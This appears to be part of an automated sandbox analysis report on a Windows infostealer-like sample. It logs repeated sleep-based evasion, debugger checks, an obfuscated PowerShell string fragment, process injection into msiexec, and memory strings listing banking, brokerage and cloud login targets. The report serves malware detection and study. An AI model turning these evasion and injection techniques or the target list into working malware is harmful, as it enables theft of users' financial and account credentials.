              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599545Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599433Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598764Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598651Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598546Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598426Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598074Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597405Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597077Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596747Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596631Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596389Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596280Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596162Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595326Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594988Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594743Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594515Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594293Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3484Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6396Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6046Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3703Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7508Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -29514790517935264s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916Thread sleep count: 3182 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916Thread sleep count: 6658 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599545s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599433s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598764s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598651s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598426s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598297s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -598074s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597844s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597734s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597625s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597516s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597405s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597297s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -597077s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596747s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596631s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596389s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596280s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596162s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -596016s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595891s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595326s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595219s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -595109s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594988s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594743s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594625s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594515s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912Thread sleep time: -594293s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599545Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599433Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598764Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598651Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598546Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598426Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598074Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597405Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597077Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596747Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596631Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596389Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596280Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596162Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595326Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594988Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594743Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594515Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594293Jump to behavior
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: wscript.exe, 00000000.00000003.1341414760.0000020B00C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: wscript.exe, 00000000.00000003.1310601389.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341504506.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1309442096.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341717301.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1343000144.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: powershell.exe, 00000003.00000002.1556524743.000002673FA05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.q%SystemRoot%\system32\mswsock.dlllpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitQ
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: wscript.exe, 00000000.00000003.1341974842.0000020B00B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&04=5
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00C1D6CC LdrInitializeThunk,LdrInitializeThunk,6_2_00C1D6CC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_7620.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4190000Jump to behavior
